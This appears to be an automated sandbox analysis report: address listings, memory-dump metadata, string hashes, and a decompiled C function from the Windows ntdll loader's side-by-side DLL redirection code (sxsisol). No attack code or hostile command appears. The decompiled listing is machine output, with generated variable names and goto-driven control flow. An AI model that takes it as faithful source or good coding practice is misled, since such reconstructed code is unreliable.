                                                        0x00b77cb5
                                                        0x00b77ca1
                                                        0x00000000
                                                        0x00b77c99
                                                        0x00b61d83
                                                        0x00b61d87
                                                        0x00b9fb7b
                                                        0x00b9fb7b
                                                        0x00b9fb85
                                                        0x00b9fb87
                                                        0x00b9fb8f
                                                        0x00b9fb90
                                                        0x00b9fb97
                                                        0x00b9fb97
                                                        0x00b61cbd
                                                        0x00b61cc3
                                                        0x00b61cc6
                                                        0x00b61cc9
                                                        0x00b61ccc
                                                        0x00b61cce
                                                        0x00b61cd6
                                                        0x00b61cdd
                                                        0x00b61cde
                                                        0x00b61cec
                                                        0x00b61cee
                                                        0x00b61cf0
                                                        0x00b9fba7
                                                        0x00b9fbad
                                                        0x00b9fbbb
                                                        0x00b9fbbb
                                                        0x00000000
                                                        0x00b9fbbb
                                                        0x00b9fbaf
                                                        0x00b9fbb5
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b61cf6
                                                        0x00b61cf6
                                                        0x00b61cf9
                                                        0x00b61cfe
                                                        0x00b61d00
                                                        0x00b61d01
                                                        0x00b61d02
                                                        0x00b61d0d
                                                        0x00b61d0f
                                                        0x00b61d11
                                                        0x00b9fbd6
                                                        0x00b9fbdc
                                                        0x00b9fbe2
                                                        0x00b9fbe8
                                                        0x00b9fbee
                                                        0x00b9fbf4
                                                        0x00b9fbfd
                                                        0x00b9fc03
                                                        0x00b9fc04
                                                        0x00b9fc09
                                                        0x00b9fc0a
                                                        0x00b9fc0c
                                                        0x00b9fc13
                                                        0x00b9fc18
                                                        0x00b9fc1a
                                                        0x00b9fc20
                                                        0x00b9fc27
                                                        0x00b9fc2d
                                                        0x00b9fc2d
                                                        0x00b9fc27
                                                        0x00b9fc1a
                                                        0x00b9fbf4
                                                        0x00b9fbe8
                                                        0x00000000
                                                        0x00b9fbdc
                                                        0x00b61d17
                                                        0x00b61d1e
                                                        0x00000000
                                                        0x00000000
                                                        0x00b61d30
                                                        0x00b61d32
                                                        0x00b61d34
                                                        0x00000000
                                                        0x00000000
                                                        0x00b9fc38
                                                        0x00b9fc3e
                                                        0x00000000
                                                        0x00b9fc44
                                                        0x00b73566
                                                        0x00000000
                                                        0x00b73566
                                                        0x00000000
                                                        0x00b9fc3e
                                                        0x00b61cf0
                                                        0x00b61d8d
                                                        0x00b61d90
                                                        0x00000000
                                                        0x00000000
                                                        0x00b61da1
                                                        0x00b61da6
                                                        0x00b61da8
                                                        0x00000000
                                                        0x00000000
                                                        0x00b61db1
                                                        0x00b61db4
                                                        0x00000000
                                                        0x00b61db4
                                                        0x00b5e772
                                                        0x00b5e777
                                                        0x00b5e779
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b5e779
                                                        0x00000000
                                                        0x00b5ed19
                                                        0x00b5e747
                                                        0x00b5e749
                                                        0x00b5e74f
                                                        0x00b5e755
                                                        0x00000000
                                                        0x00b5e755

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID:
                                                        • String ID: DLL name: %wZ DLL path: %wZ$LdrpFindOrMapDll$MZER$Status: 0x%08lx$`%V$d:\w7rtm\minkernel\ntdll\ldrfind.c$h%V
                                                        • API String ID: 0-2327381616
                                                        • Opcode ID: df928fd5b315c08e783be170568ab0158b523ff444de040f428603ce0cf85dea
                                                        • Instruction ID: 80ae916221f06a01f0be942bdeb5863bd898fac8518e998363c0323b05dd2a6c
                                                        • Opcode Fuzzy Hash: df928fd5b315c08e783be170568ab0158b523ff444de040f428603ce0cf85dea
                                                        • Instruction Fuzzy Hash: 2D327972900209AFDF21DFA4C885BAEBBF5FF08300F2444AAF965A7261D774DA45DB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 87%
                                                        			E00B4F3CF(signed short* __ecx, signed short __edx, signed short* __esi, char _a4, signed int _a8) {
                                                        				signed int _v8;
                                                        				short _v12;
                                                        				short _v24;
                                                        				intOrPtr _v28;
                                                        				short* _v32;
                                                        				short* _v36;
                                                        				short* _v40;
                                                        				short _v42;
                                                        				signed int _v44;
                                                        				signed int _v48;
                                                        				signed int _v52;
                                                        				signed short _v56;
                                                        				signed int _v60;
                                                        				signed short _v64;
                                                        				signed int _v68;
                                                        				signed int _v72;
                                                        				signed int _v76;
                                                        				signed int _v80;
                                                        				signed char* _v84;
                                                        				signed int _v88;
                                                        				char _v92;
                                                        				signed int _v116;
                                                        				intOrPtr _v120;
                                                        				intOrPtr _v124;
                                                        				intOrPtr _v128;
                                                        				intOrPtr _v132;
                                                        				intOrPtr _v144;
                                                        				intOrPtr _v148;
                                                        				char _v152;
                                                        				char _v156;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __ebp;
                                                        				signed int _t186;
                                                        				short _t194;
                                                        				short* _t196;
                                                        				intOrPtr _t205;
                                                        				signed char* _t206;
                                                        				signed char _t207;
                                                        				signed int _t209;
                                                        				signed short* _t210;
                                                        				void* _t214;
                                                        				signed int _t215;
                                                        				signed int _t219;
                                                        				void* _t221;
                                                        				signed int _t223;
                                                        				signed short _t227;
                                                        				signed char _t232;
                                                        				void* _t237;
                                                        				signed int _t238;
                                                        				signed short _t242;
                                                        				signed int _t245;
                                                        				signed int _t254;
                                                        				void* _t255;
                                                        				signed int _t256;
                                                        				signed short _t260;
                                                        				void* _t266;
                                                        				signed int _t267;
                                                        				signed int _t271;
                                                        				signed short* _t282;
                                                        				signed int _t283;
                                                        				signed int _t287;
                                                        				signed int _t288;
                                                        				signed int _t291;
                                                        				intOrPtr* _t296;
                                                        				intOrPtr _t297;
                                                        				signed int _t299;
                                                        				signed int* _t300;
                                                        				signed short _t304;
                                                        				char* _t337;
                                                        				signed int* _t342;
                                                        				signed int _t345;
                                                        				signed short* _t347;
                                                        				signed int _t348;
                                                        				void* _t349;
                                                        				void* _t350;
                                                        
                                                        				_t347 = __esi;
                                                        				_t186 =  *0xc22088; // 0x76fbb2c1
                                                        				_v8 = _t186 ^ _t348;
                                                        				_v88 = _a8;
                                                        				_t345 = __edx;
                                                        				_t282 = __ecx;
                                                        				_v56 = __edx;
                                                        				_v156 = 0x40;
                                                        				E00B4DFC0( &_v152, 0, 0x3c);
                                                        				_t350 = _t349 + 0xc;
                                                        				_v68 =  *_t282;
                                                        				_v64 = _t282[2];
                                                        				_t337 =  &_v12;
                                                        				_v32 = _t337;
                                                        				_v40 = _t337;
                                                        				_v36 =  &_v12;
                                                        				_t194 = 2;
                                                        				_v12 = 0;
                                                        				_v44 = 0;
                                                        				_v42 = _t194;
                                                        				_t341 =  &_v68;
                                                        				_v72 = 0;
                                                        				_v60 = 0;
                                                        				_v28 = _t194;
                                                        				_v24 = _t194;
                                                        				_t283 = E00B4ED18(3, 0, _t194,  &_v68,  &_v156);
                                                        				if(_t283 >= 0) {
                                                        					__eflags = _a4;
                                                        					if(_a4 != 0) {
                                                        						L44:
                                                        						_t283 = 0;
                                                        						L2:
                                                        						_t291 = _v36;
                                                        						_t196 = _v32;
                                                        						if(_t291 != 0) {
                                                        							if(_t291 != _t196) {
                                                        								_v88 = _t291;
                                                        								E00B4E1C6( &_v92);
                                                        								_t196 = _v32;
                                                        							}
                                                        							_v36 = _t196;
                                                        							_v28 = _v24;
                                                        						}
                                                        						_v40 = _t196;
                                                        						if(_t196 != 0) {
                                                        							 *_t196 = 0;
                                                        						}
                                                        						_v44 = 0;
                                                        						_t198 = _v24;
                                                        						_v42 = _v24;
                                                        						if(_v72 != 0) {
                                                        							E00B5B90D(_t198, _v72);
                                                        						}
                                                        						return E00B4E1B4(_t283, _t283, _v8 ^ _t348, _t341, _t345, _t347);
                                                        					}
                                                        					__eflags = _v144 - 0x14;
                                                        					_v72 = _v124;
                                                        					if(_v144 < 0x14) {
                                                        						L48:
                                                        						_t283 = 0xc0150003;
                                                        						goto L2;
                                                        					}
                                                        					__eflags = _v152 - 1;
                                                        					if(_v152 != 1) {
                                                        						goto L48;
                                                        					}
                                                        					_t205 = _v148;
                                                        					_t296 = _t205 + 0x10;
                                                        					_v52 = _t296;
                                                        					_t297 =  *_t296;
                                                        					__eflags = _t297 - _v128;
                                                        					if(_t297 > _v128) {
                                                        						goto L48;
                                                        					}
                                                        					_t342 = _t205 + 0xc;
                                                        					_v76 = _t342;
                                                        					_t341 =  *_t342;
                                                        					__eflags = _t341 - 0x1fffffff;
                                                        					if(_t341 > 0x1fffffff) {
                                                        						goto L48;
                                                        					}
                                                        					_t341 = _t341 << 3;
                                                        					__eflags = _t297 - (_t283 | 0xffffffff) - _t341;
                                                        					if(_t297 > (_t283 | 0xffffffff) - _t341) {
                                                        						goto L48;
                                                        					}
                                                        					_t341 = _t341 + _t297;
                                                        					__eflags = _t341 - _v128;
                                                        					if(_t341 > _v128) {
                                                        						goto L48;
                                                        					}
                                                        					_t206 = _t205 + 4;
                                                        					_v84 = _t206;
                                                        					_t207 =  *_t206;
                                                        					__eflags = _t207 & 0x00000002;
                                                        					if((_t207 & 0x00000002) == 0) {
                                                        						L22:
                                                        						_t287 =  *_v52 + _v132;
                                                        						_t209 = 0;
                                                        						 *_t345 = 0;
                                                        						_t299 =  *_v76;
                                                        						_v52 = _t299;
                                                        						__eflags = _t299;
                                                        						while(1) {
                                                        							_v48 = _t209;
                                                        							if(__eflags == 0) {
                                                        								break;
                                                        							}
                                                        							_t300 = _t287 + 4 + _t209 * 8;
                                                        							_t341 =  *_t300;
                                                        							_v76 = _t341;
                                                        							__eflags = _t341 - _v128;
                                                        							if(_t341 > _v128) {
                                                        								goto L48;
                                                        							}
                                                        							_t210 = _t287 + _t209 * 8;
                                                        							_t341 = (_t341 | 0xffffffff) -  *_t210;
                                                        							__eflags =  *_t300 - _t341;
                                                        							if( *_t300 > _t341) {
                                                        								goto L48;
                                                        							}
                                                        							__eflags =  *_t210 + _v76 - _v128;
                                                        							if( *_t210 + _v76 > _v128) {
                                                        								goto L48;
                                                        							}
                                                        							 *_t345 =  *_t345 + ( *_t210 & 0x0000ffff);
                                                        							_t209 = _v48 + 1;
                                                        							__eflags = _t209 - _v52;
                                                        						}
                                                        						_t303 = _v60;
                                                        						__eflags = _t303;
                                                        						if(_t303 != 0) {
                                                        							 *_t345 =  *_t345 + ( *_t303 & 0x0000ffff);
                                                        							__eflags =  *_t345;
                                                        						}
                                                        						_t214 = ( *_t345 & 0x0000ffff) + 2;
                                                        						__eflags = _t214 - 0xfffe;
                                                        						if(_t214 > 0xfffe) {
                                                        							L76:
                                                        							_t283 = 0xc0000106;
                                                        							goto L2;
                                                        						} else {
                                                        							_t345 =  &(_t347[4]);
                                                        							__eflags = _t345;
                                                        							if(_t345 == 0) {
                                                        								L60:
                                                        								_t215 = E00B778E5(0, _t345, _t214);
                                                        								__eflags = _t215;
                                                        								if(_t215 >= 0) {
                                                        									_t303 = _v60;
                                                        									L29:
                                                        									_t347[2] =  *_t345;
                                                        									_t347[1] = _t347[8];
                                                        									__eflags = _t303;
                                                        									if(_t303 == 0) {
                                                        										L34:
                                                        										_v48 = _v48 & 0x00000000;
                                                        										__eflags = _v52;
                                                        										if(_v52 != 0) {
                                                        											while(1) {
                                                        												_t219 = _v48 << 3;
                                                        												_t304 =  *((intOrPtr*)(_t219 + _t287));
                                                        												_t345 =  *((intOrPtr*)(_t219 + _t287 + 4)) + _v132;
                                                        												_v80 = _t304;
                                                        												_t221 = ( *_t347 & 0x0000ffff) + (_t304 & 0x0000ffff) + 2;
                                                        												__eflags = _t221 - 0xfffe;
                                                        												if(_t221 > 0xfffe) {
                                                        													goto L76;
                                                        												}
                                                        												__eflags =  &(_t347[4]);
                                                        												if( &(_t347[4]) == 0) {
                                                        													L68:
                                                        													_t223 = E00B778E5(0,  &(_t347[4]), _t221);
                                                        													__eflags = _t223;
                                                        													if(_t223 < 0) {
                                                        														goto L61;
                                                        													}
                                                        													L69:
                                                        													_t347[2] = _t347[4];
                                                        													E00B58980(_t347[4] + (( *_t347 & 0x0000ffff) >> 1) * 2, _t345, _v80 & 0x0000ffff);
                                                        													_t227 = _v80;
                                                        													 *_t347 =  *_t347 + _t227;
                                                        													_t347[1] =  *_t347 + _t227 + 2;
                                                        													_t303 = _t347[2];
                                                        													_t341 = 0;
                                                        													_t350 = _t350 + 0xc;
                                                        													_v48 = _v48 + 1;
                                                        													 *((short*)(_t347[2] + (( *_t347 & 0x0000ffff) >> 1) * 2)) = 0;
                                                        													__eflags = _v48 - _v52;
                                                        													if(_v48 == _v52) {
                                                        														goto L35;
                                                        													}
                                                        													continue;
                                                        												}
                                                        												__eflags = _t221 - _t347[8];
                                                        												if(_t221 <= _t347[8]) {
                                                        													goto L69;
                                                        												}
                                                        												goto L68;
                                                        											}
                                                        											goto L76;
                                                        										}
                                                        										L35:
                                                        										_t232 =  *_v84;
                                                        										_t345 = _v56;
                                                        										__eflags = _t232 & 0x00000001;
                                                        										if((_t232 & 0x00000001) != 0) {
                                                        											L42:
                                                        											__eflags =  *_v84 & 0x00000004;
                                                        											if(__eflags != 0) {
                                                        												_push(0);
                                                        												_t341 = _t347;
                                                        												_t283 = E00BCC0DD(_t287,  &_v44, _t347, _t345, _t347, __eflags);
                                                        												__eflags = _t283;
                                                        												if(_t283 < 0) {
                                                        													goto L2;
                                                        												}
                                                        												 *_t347 = 0;
                                                        												_t237 = (_v44 & 0x0000ffff) + 2;
                                                        												__eflags = _t237 - 0xfffe;
                                                        												if(_t237 > 0xfffe) {
                                                        													goto L76;
                                                        												}
                                                        												_t288 =  &(_t347[4]);
                                                        												__eflags = _t288;
                                                        												if(_t288 == 0) {
                                                        													L83:
                                                        													_t238 = E00B778E5(0, _t288, _t237);
                                                        													__eflags = _t238;
                                                        													if(_t238 < 0) {
                                                        														goto L61;
                                                        													}
                                                        													L84:
                                                        													_t347[2] =  *_t288;
                                                        													E00B58980( *_t288 + (( *_t347 & 0x0000ffff) >> 1) * 2, _v40, _v44 & 0x0000ffff);
                                                        													_t242 = _v44;
                                                        													 *_t347 =  *_t347 + _t242;
                                                        													_t347[1] =  *_t347 + _t242 + 2;
                                                        													_t341 = 0;
                                                        													 *((short*)(_t347[2] + (( *_t347 & 0x0000ffff) >> 1) * 2)) = 0;
                                                        													goto L43;
                                                        												}
                                                        												__eflags = _t237 - _t347[8];
                                                        												if(_t237 <= _t347[8]) {
                                                        													goto L84;
                                                        												}
                                                        												goto L83;
                                                        											}
                                                        											L43:
                                                        											_t245 = _v88;
                                                        											__eflags = _t245;
                                                        											if(_t245 != 0) {
                                                        												 *_t245 =  *_t245 | 0x00000002;
                                                        											}
                                                        											goto L44;
                                                        										}
                                                        										__eflags = _t232 & 0x00000008;
                                                        										if((_t232 & 0x00000008) != 0) {
                                                        											_t283 = E00B4FBD7(1,  &_v68, 0xb7b024,  &_v56);
                                                        											__eflags = _t283;
                                                        											if(_t283 >= 0) {
                                                        												_v68 = _v68 + 0xfffe - _v56;
                                                        												_v64 = _v64 + 2 + ((_v56 & 0x0000ffff) >> 1) * 2;
                                                        												goto L37;
                                                        											}
                                                        											__eflags = _t283 - 0xc0000225;
                                                        											if(_t283 != 0xc0000225) {
                                                        												goto L2;
                                                        											}
                                                        											_push("Status != STATUS_NOT_FOUND");
                                                        											_push(0x472);
                                                        											L74:
                                                        											_push("d:\\w7rtm\\minkernel\\ntdll\\sxsisol.cpp");
                                                        											_push("Internal error check failed");
                                                        											E00BD77A7(_t303, _t341);
                                                        											_t283 = 0xc00000e5;
                                                        											goto L2;
                                                        										}
                                                        										L37:
                                                        										_t254 = _v68 & 0x0000ffff;
                                                        										 *_t345 =  *_t345 + _t254;
                                                        										__eflags =  *_t345 - 0xffff;
                                                        										if( *_t345 >= 0xffff) {
                                                        											goto L76;
                                                        										}
                                                        										_t255 = ( *_t347 & 0x0000ffff) + _t254 + 2;
                                                        										__eflags = _t255 - 0xfffe;
                                                        										if(_t255 > 0xfffe) {
                                                        											goto L76;
                                                        										}
                                                        										_t287 =  &(_t347[4]);
                                                        										__eflags = _t287;
                                                        										if(_t287 == 0) {
                                                        											L77:
                                                        											_t256 = E00B778E5(0, _t287, _t255);
                                                        											__eflags = _t256;
                                                        											if(_t256 >= 0) {
                                                        												L41:
                                                        												_t347[2] =  *_t287;
                                                        												E00B58980( *_t287 + (( *_t347 & 0x0000ffff) >> 1) * 2, _v64, _v68 & 0x0000ffff);
                                                        												_t260 = _v68;
                                                        												 *_t347 =  *_t347 + _t260;
                                                        												_t347[1] =  *_t347 + _t260 + 2;
                                                        												_t350 = _t350 + 0xc;
                                                        												_t341 = 0;
                                                        												__eflags = 0;
                                                        												 *((short*)(_t347[2] + (( *_t347 & 0x0000ffff) >> 1) * 2)) = 0;
                                                        												goto L42;
                                                        											}
                                                        											goto L61;
                                                        										}
                                                        										__eflags = _t255 - _t347[8];
                                                        										if(_t255 > _t347[8]) {
                                                        											goto L77;
                                                        										}
                                                        										goto L41;
                                                        									}
                                                        									 *_t347 = 0;
                                                        									_t266 = ( *_t303 & 0x0000ffff) + 2;
                                                        									__eflags = _t266 - 0xfffe;
                                                        									if(_t266 > 0xfffe) {
                                                        										goto L76;
                                                        									}
                                                        									__eflags = _t345;
                                                        									if(_t345 == 0) {
                                                        										L63:
                                                        										_t267 = E00B778E5(0, _t345, _t266);
                                                        										__eflags = _t267;
                                                        										if(_t267 < 0) {
                                                        											goto L61;
                                                        										}
                                                        										_t303 = _v60;
                                                        										L33:
                                                        										_t347[2] =  *_t345;
                                                        										E00B58980( *_t345 + (( *_t347 & 0x0000ffff) >> 1) * 2,  *((intOrPtr*)(_t303 + 4)),  *_t303 & 0x0000ffff);
                                                        										_t271 = _v60;
                                                        										_t350 = _t350 + 0xc;
                                                        										_t347[1] =  *_t347 +  *_t271 + 2;
                                                        										 *_t347 =  *_t347 +  *_t271;
                                                        										_t303 = _t347[2];
                                                        										_t341 = 0;
                                                        										__eflags = 0;
                                                        										 *((short*)(_t347[2] + (( *_t347 & 0x0000ffff) >> 1) * 2)) = 0;
                                                        										goto L34;
                                                        									}
                                                        									__eflags = _t266 - _t347[8];
                                                        									if(_t266 > _t347[8]) {
                                                        										goto L63;
                                                        									}
                                                        									goto L33;
                                                        								}
                                                        								L61:
                                                        								_t283 = 0xc0000017;
                                                        								goto L2;
                                                        							}
                                                        							__eflags = _t214 - _t347[8];
                                                        							if(_t214 > _t347[8]) {
                                                        								goto L60;
                                                        							}
                                                        							goto L29;
                                                        						}
                                                        					}
                                                        					_t303 = 0;
                                                        					_v48 = 0;
                                                        					__eflags = _t207 & 0x00000004;
                                                        					if((_t207 & 0x00000004) != 0) {
                                                        						_push("sxsisol_SearchActCtxForDllName");
                                                        						_push( *((intOrPtr*)( *[fs:0x18] + 0x24)));
                                                        						E00B93F92(0x33, 0, "[%x.%x] SXS: %s - Relative redirection plus env var expansion.\n",  *((intOrPtr*)( *[fs:0x18] + 0x20)));
                                                        						goto L48;
                                                        					}
                                                        					__eflags = _v116 & 0x00000001;
                                                        					if((_v116 & 0x00000001) != 0) {
                                                        						__eflags = _v116 & 0x00000002;
                                                        						if((_v116 & 0x00000002) != 0) {
                                                        							_push("!(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)");
                                                        							_push(0x416);
                                                        							goto L74;
                                                        						}
                                                        						_t303 = 1;
                                                        					}
                                                        					__eflags = _v116 & 0x00000002;
                                                        					if((_v116 & 0x00000002) != 0) {
                                                        						_t303 = _t303 | 0x00000002;
                                                        					}
                                                        					_t283 = E00B6C507(_t303, _v124, _v120,  &_v60, E00B6CDAD,  &_v48);
                                                        					__eflags = _t283;
                                                        					if(_t283 < 0) {
                                                        						__eflags = _t283 - 0xc0000120;
                                                        						if(_t283 == 0xc0000120) {
                                                        							__eflags = _v48;
                                                        							if(_v48 < 0) {
                                                        								_t283 = _v48;
                                                        							}
                                                        						}
                                                        						goto L2;
                                                        					} else {
                                                        						goto L22;
                                                        					}
                                                        				}
                                                        				if(_t283 == 0xc0150001) {
                                                        					_t283 = _t283 + 7;
                                                        				}
                                                        				goto L2;
                                                        			}

                                                        0x00b6c391
                                                        0x00b6c394
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba3c35
                                                        0x00ba3c39
                                                        0x00ba3c3b
                                                        0x00ba3c3e
                                                        0x00ba3c41
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba3c4a
                                                        0x00ba3c4d
                                                        0x00ba3c4f
                                                        0x00ba3c51
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba3c5c
                                                        0x00ba3c5f
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba3c68
                                                        0x00ba3c6d
                                                        0x00ba3c6e
                                                        0x00ba3c6e
                                                        0x00b6c39a
                                                        0x00b6c39d
                                                        0x00b6c39f
                                                        0x00b6c3a4
                                                        0x00b6c3a4
                                                        0x00b6c3a4
                                                        0x00b6c3a9
                                                        0x00b6c3ac
                                                        0x00b6c3b1
                                                        0x00ba3dae
                                                        0x00ba3dae
                                                        0x00000000
                                                        0x00b6c3b7
                                                        0x00b6c3b7
                                                        0x00b6c3ba
                                                        0x00b6c3bc
                                                        0x00ba3c76
                                                        0x00ba3c7a
                                                        0x00ba3c7f
                                                        0x00ba3c81
                                                        0x00ba3c8d
                                                        0x00b6c3cb
                                                        0x00b6c3cd
                                                        0x00b6c3d4
                                                        0x00b6c3d8
                                                        0x00b6c3da
                                                        0x00b6c445
                                                        0x00b6c445
                                                        0x00b6c449
                                                        0x00b6c44d
                                                        0x00ba3caa
                                                        0x00ba3cad
                                                        0x00ba3cb0
                                                        0x00ba3cb8
                                                        0x00ba3cbe
                                                        0x00ba3cc5
                                                        0x00ba3cc9
                                                        0x00ba3cce
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba3cd7
                                                        0x00ba3cd9
                                                        0x00ba3ce0
                                                        0x00ba3ce7
                                                        0x00ba3cec
                                                        0x00ba3cee
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba3cf0
                                                        0x00ba3cfd
                                                        0x00ba3d05
                                                        0x00ba3d0d
                                                        0x00ba3d11
                                                        0x00ba3d20
                                                        0x00ba3d24
                                                        0x00ba3d27
                                                        0x00ba3d29
                                                        0x00ba3d2c
                                                        0x00ba3d2f
                                                        0x00ba3d36
                                                        0x00ba3d39
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba3d3f
                                                        0x00ba3cdb
                                                        0x00ba3cde
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba3cde
                                                        0x00000000
                                                        0x00ba3caa
                                                        0x00b6c453
                                                        0x00b6c456
                                                        0x00b6c458
                                                        0x00b6c45b
                                                        0x00b6c45d
                                                        0x00b6c4e4
                                                        0x00b6c4e7
                                                        0x00b6c4ea
                                                        0x00ba3dce
                                                        0x00ba3dd3
                                                        0x00ba3dda
                                                        0x00ba3ddc
                                                        0x00ba3dde
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba3de6
                                                        0x00ba3ded
                                                        0x00ba3df0
                                                        0x00ba3df5
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba3df7
                                                        0x00ba3dfa
                                                        0x00ba3dfc
                                                        0x00ba3e03
                                                        0x00ba3e07
                                                        0x00ba3e0c
                                                        0x00ba3e0e
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba3e14
                                                        0x00ba3e23
                                                        0x00ba3e2a
                                                        0x00ba3e32
                                                        0x00ba3e36
                                                        0x00ba3e43
                                                        0x00ba3e4f
                                                        0x00ba3e51
                                                        0x00000000
                                                        0x00ba3e51
                                                        0x00ba3dfe
                                                        0x00ba3e01
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba3e01
                                                        0x00b6c4f0
                                                        0x00b6c4f0
                                                        0x00b6c4f3
                                                        0x00b6c4f5
                                                        0x00ba3e5a
                                                        0x00ba3e5a
                                                        0x00000000
                                                        0x00b6c4f5
                                                        0x00b6c463
                                                        0x00b6c465
                                                        0x00ba3d58
                                                        0x00ba3d5a
                                                        0x00ba3d5c
                                                        0x00ba3d98
                                                        0x00ba3da6
                                                        0x00000000
                                                        0x00ba3da6
                                                        0x00ba3d5e
                                                        0x00ba3d64
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba3d6a
                                                        0x00ba3d6f
                                                        0x00ba3d74
                                                        0x00ba3d74
                                                        0x00ba3d79
                                                        0x00ba3d7e
                                                        0x00ba3d83
                                                        0x00000000
                                                        0x00ba3d83
                                                        0x00b6c46b
                                                        0x00b6c46b
                                                        0x00b6c46f
                                                        0x00b6c471
                                                        0x00b6c477
                                                        0x00000000
                                                        0x00000000
                                                        0x00b6c480
                                                        0x00b6c484
                                                        0x00b6c489
                                                        0x00000000
                                                        0x00000000
                                                        0x00b6c48f
                                                        0x00b6c492
                                                        0x00b6c494
                                                        0x00ba3db8
                                                        0x00ba3dbc
                                                        0x00ba3dc1
                                                        0x00ba3dc3
                                                        0x00b6c4a3
                                                        0x00b6c4b2
                                                        0x00b6c4b9
                                                        0x00b6c4c1
                                                        0x00b6c4c5
                                                        0x00b6c4d2
                                                        0x00b6c4db
                                                        0x00b6c4de
                                                        0x00b6c4de
                                                        0x00b6c4e0
                                                        0x00000000
                                                        0x00b6c4e0
                                                        0x00000000
                                                        0x00ba3dc9
                                                        0x00b6c49a
                                                        0x00b6c49d
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b6c49d
                                                        0x00b6c3de
                                                        0x00b6c3e4
                                                        0x00b6c3e7
                                                        0x00b6c3ec
                                                        0x00000000
                                                        0x00000000
                                                        0x00b6c3f2
                                                        0x00b6c3f4
                                                        0x00ba3c95
                                                        0x00ba3c99
                                                        0x00ba3c9e
                                                        0x00ba3ca0
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba3ca2
                                                        0x00b6c403
                                                        0x00b6c405
                                                        0x00b6c418
                                                        0x00b6c420
                                                        0x00b6c426
                                                        0x00b6c42d
                                                        0x00b6c434
                                                        0x00b6c43a
                                                        0x00b6c43f
                                                        0x00b6c43f
                                                        0x00b6c441
                                                        0x00000000
                                                        0x00b6c441
                                                        0x00b6c3fa
                                                        0x00b6c3fd
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b6c3fd
                                                        0x00ba3c83
                                                        0x00ba3c83
                                                        0x00000000
                                                        0x00ba3c83
                                                        0x00b6c3c2
                                                        0x00b6c3c5
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b6c3c5
                                                        0x00b6c3b1
                                                        0x00b6c337
                                                        0x00b6c339
                                                        0x00b6c33c
                                                        0x00b6c33e
                                                        0x00ba3bce
                                                        0x00ba3bd3
                                                        0x00ba3be7
                                                        0x00000000
                                                        0x00ba3bec
                                                        0x00b6c344
                                                        0x00b6c348
                                                        0x00b7c1a5
                                                        0x00b7c1a9
                                                        0x00ba3c08
                                                        0x00ba3c0d
                                                        0x00000000
                                                        0x00ba3c0d
                                                        0x00b7c1b1
                                                        0x00b7c1b1
                                                        0x00b6c34e
                                                        0x00b6c352
                                                        0x00b8431f
                                                        0x00b8431f
                                                        0x00b6c371
                                                        0x00b6c373
                                                        0x00b6c375
                                                        0x00ba3c17
                                                        0x00ba3c1d
                                                        0x00ba3c23
                                                        0x00ba3c27
                                                        0x00ba3c2d
                                                        0x00ba3c2d
                                                        0x00ba3c27
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b6c375
                                                        0x00b4f46f
                                                        0x00ba3bc0
                                                        0x00ba3bc0
                                                        0x00000000

                                                        Strings
                                                        • sxsisol_SearchActCtxForDllName, xrefs: 00BA3BCE
                                                        • Status != STATUS_NOT_FOUND, xrefs: 00BA3D6A
                                                        • d:\w7rtm\minkernel\ntdll\sxsisol.cpp, xrefs: 00BA3D74
                                                        • Internal error check failed, xrefs: 00BA3D79
                                                        • [%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 00BA3BDF
                                                        • !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 00BA3C08
                                                        • @, xrefs: 00B4F3FE
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID:
